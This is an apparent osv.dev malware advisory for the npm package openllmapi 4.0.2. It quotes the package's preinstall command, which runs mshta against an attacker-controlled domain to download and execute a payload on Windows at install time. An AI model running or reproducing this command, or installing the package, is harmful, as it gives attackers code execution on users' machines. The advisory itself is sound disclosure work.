npm

openllmapi @4.0.2

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID

MAL-2026-6364

Ecosystem

npm

Summary

The package's preinstall lifecycle script (preinstall.js line 3) runs cmd /c "mshta http://fixars.top", which causes Windows mshta.exe to download and execute an HTML Application from the attacker-controlled domain fixars.top over plain HTTP. This fires automatically on npm install (unless lifecycle scripts are disabled with --ignore-scripts or ignore-scripts=true in .npmrc) and yields arbitrary code execution on the installer's machine with the installing user's privileges; because the payload is launched through cmd.exe and mshta.exe, the download-and-execute stage only runs on Windows hosts. The package metadata is consistent with a throwaway malicious publish: empty author, no repository or homepage, and a generic description ('Node.js wrapper for OpenLLM API service.') that does not match the install-time behavior.

Source: amazon-inspector (9df5662b44b20595801c25919ac14689b71e89b8c1bdacceedc7ba1e9cf75c41)
